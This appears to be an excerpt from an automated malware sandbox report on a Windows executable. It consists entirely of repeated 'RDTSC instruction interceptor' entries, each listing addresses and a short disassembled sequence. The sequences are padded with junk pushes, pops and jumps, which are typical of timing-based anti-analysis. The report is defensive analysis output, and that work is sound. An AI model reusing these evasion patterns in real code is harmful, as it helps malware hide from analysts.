                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C0788 second address: 2C078D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C0A62 second address: 2C0A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F0549119936h 0x0000000d jmp 00007F054911993Fh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 js 00007F0549119936h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C0E7E second address: 2C0E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C0E82 second address: 2C0E96 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0549119936h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C0E96 second address: 2C0E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C0FE7 second address: 2C1003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0549119946h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C1003 second address: 2C1046 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05491602D8h 0x00000008 jmp 00007F05491602DDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F05491602D6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F05491602E7h 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C4DC2 second address: 2C4DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C4944 second address: 2C495E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F05491602DDh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2C495E second address: 2C4962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CC33B second address: 2CC33F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CC33F second address: 2CC34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CC34B second address: 2CC34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BAA2 second address: 27BAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BAA8 second address: 27BAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 sub ecx, dword ptr [ebp+122D2913h] 0x0000000d mov ebx, dword ptr [ebp+12486BD8h] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F05491602D8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d clc 0x0000002e add eax, ebx 0x00000030 mov edi, dword ptr [ebp+122D3873h] 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F05491602E3h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BAFD second address: 27BB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BB02 second address: 27BB07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 27BB07 second address: 27BB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0549119938h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 cld 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F0549119938h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2C54h], edx 0x00000049 push eax 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CC65B second address: 2CC67B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05491602DAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F0549160301h 0x00000018 jbe 00007F05491602E2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CD156 second address: 2CD15A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CD15A second address: 2CD18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05491602DAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05491602E9h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CD18B second address: 2CD1A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F054911993Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CD1A0 second address: 2CD1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2CFC6F second address: 2CFC79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0549119936h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2D41B7 second address: 2D41D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2D4636 second address: 2D463C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DD69A second address: 2DD6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DD846 second address: 2DD84C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DD84C second address: 2DD85B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DD85B second address: 2DD85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DD978 second address: 2DD97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DD97E second address: 2DD988 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0549119936h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DDC14 second address: 2DDC2D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 jmp 00007F05491602DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DDC2D second address: 2DDC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0549119936h 0x00000009 jmp 00007F054911993Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DDC4A second address: 2DDC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DDF33 second address: 2DDF55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119947h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DDF55 second address: 2DDF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE278 second address: 2DE28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jnp 00007F0549119936h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE28A second address: 2DE290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE290 second address: 2DE298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE298 second address: 2DE29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE29E second address: 2DE2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119945h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3390 second address: 2E3398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3398 second address: 2E33A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0549119936h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E33A7 second address: 2E33AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E33AB second address: 2E33D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F054911993Dh 0x00000012 jmp 00007F054911993Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2834 second address: 2E283C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E283C second address: 2E2842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2842 second address: 2E2846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2846 second address: 2E2876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F054911993Ch 0x00000010 jl 00007F0549119936h 0x00000016 jnl 00007F054911994Ah 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2DB4 second address: 2E2DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F05491602E2h 0x00000010 jl 00007F05491602D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3075 second address: 2E3083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3083 second address: 2E3087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3087 second address: 2E308D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E308D second address: 2E3093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E78EA second address: 2E78FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0549119936h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EEDF5 second address: 2EEDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EEDFA second address: 2EEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EEE00 second address: 2EEE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EF87B second address: 2EF888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F0549119936h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EFB58 second address: 2EFB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EFB5E second address: 2EFB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EE8E6 second address: 2EE8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2F65AF second address: 2F65B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2F65B9 second address: 2F65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2F61C3 second address: 2F61C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3065CA second address: 3065D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3065D1 second address: 3065E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 306052 second address: 306056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 306056 second address: 306078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Dh 0x0000000b pop edx 0x0000000c jng 00007F0549119957h 0x00000012 je 00007F0549119951h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3061F0 second address: 3061F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3080E7 second address: 3080EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 30EBAF second address: 30EBC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 30EBC5 second address: 30EBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Eh 0x0000000b popad 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 30EBDE second address: 30EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 317D29 second address: 317D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F0549119936h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 317D3A second address: 317D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 31CACD second address: 31CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 22C889 second address: 22C89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F05491602DBh 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3226FC second address: 322700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EDB second address: 322EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EE1 second address: 322EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EE5 second address: 322EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EE9 second address: 322EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 323A9A second address: 323AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 323AA4 second address: 323AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 323AAE second address: 323AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3293FC second address: 329407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0549119936h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 337A15 second address: 337A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 339DA6 second address: 339DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B697 second address: 33B6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F05491602D6h 0x0000000a jmp 00007F05491602E2h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B6B9 second address: 33B6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
